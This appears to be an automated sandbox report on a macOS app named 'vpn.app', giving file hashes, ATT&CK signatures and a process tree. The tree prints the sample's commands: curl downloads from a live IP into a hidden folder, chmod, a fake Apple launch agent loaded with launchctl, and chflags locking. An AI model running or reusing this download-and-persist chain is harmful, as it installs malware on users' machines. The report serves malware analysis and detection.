Resubmissions

07-11-2024 18:36

241107-w9c14sxcjh 10

Analysis

  • max time kernel
    77s
  • max time network
    147s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    07-11-2024 18:36

General

  • Target

    vpn.app/Contents/MacOS/vpn

  • Size

    106KB

  • MD5

    6d6ee4e9054cd7886902cf5a4ed215fd

  • SHA1

    b486104d58bd9e267ab761bfdaa7955942bebcb8

  • SHA256

    6f551940380e2a4d4db3c9b25e85ef9d3c7628dbb60994b0ec066024cd355d45

  • SHA512

    972a26cd02f96fccd71151cac3fa51afc1c72d89f51886b01e19022f978e6322cda601eb68085b2a35d1a8d600f7b225f65f5e37ef5b340c7ab3baf0d7eac888

  • SSDEEP

    1536:EI3I09nvBbpIBBRVOAUOaT1CYjLxdC1hngLLFTAI+uIMRDdcC:El0FvB6BRVGOteHC1hngLLFsI+LMRL

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • Launch Agent 1 TTPs

    Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Launchctl 1 TTPs 2 IoCs

    Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""
    1⤵
      PID:452
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""
      1⤵
        PID:452
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn
        1⤵
          PID:452
          • /bin/zsh
            /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn
            2⤵
              PID:453
            • /Users/run/vpn.app/Contents/MacOS/vpn
              /Users/run/vpn.app/Contents/MacOS/vpn
              2⤵
                PID:453
            • /bin/bash
              /bin/bash /Users/run/vpn.app/Contents/Resources/script
              1⤵
                PID:477
                • /usr/bin/uname
                  uname -m
                  2⤵
                    PID:478
                  • /bin/mkdir
                    mkdir /Users/run/.androids
                    2⤵
                      PID:479
                    • /usr/bin/curl
                      curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated
                      2⤵
                        PID:480
                      • /bin/chmod
                        chmod a+x /Users/run/.androids/softwareupdated
                        2⤵
                          PID:502
                        • /bin/chmod
                          chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                          2⤵
                            PID:503
                          • /bin/launchctl
                            launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                            2⤵
                              PID:504
                            • /bin/launchctl
                              launchctl start softwareupdated
                              2⤵
                                PID:506
                              • /Users/run/.androids/softwareupdated
                                /Users/run/.androids/softwareupdated
                                2⤵
                                  PID:507
                                • /usr/bin/chflags
                                  chflags uchg /Users/run/.androids/softwareupdated
                                  2⤵
                                    PID:508
                                  • /usr/bin/curl
                                    curl -L http://46.137.201.254/covid -o /Users/run/covid
                                    2⤵
                                      PID:509
                                  • /usr/libexec/xpcproxy
                                    xpcproxy com.apple.nsurlstoraged
                                    1⤵
                                      PID:484
                                    • /usr/libexec/nsurlstoraged
                                      /usr/libexec/nsurlstoraged --privileged
                                      1⤵
                                        PID:484
                                      • /usr/libexec/xpcproxy
                                        xpcproxy softwareupdated
                                        1⤵
                                          PID:505
                                        • /Users/run/.androids/softwareupdated
                                          /Users/run/.androids/softwareupdated -D
                                          1⤵
                                            PID:505

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • /var/db/nsurlstoraged/dafsaData.bin

                                            Filesize

                                            54KB

                                            MD5

                                            64f469698e53d0c828b7f90acd306082

                                            SHA1

                                            bcc041b3849e1b0b4104ffeb46002207eeac54f3

                                            SHA256

                                            d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                                            SHA512

                                            a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f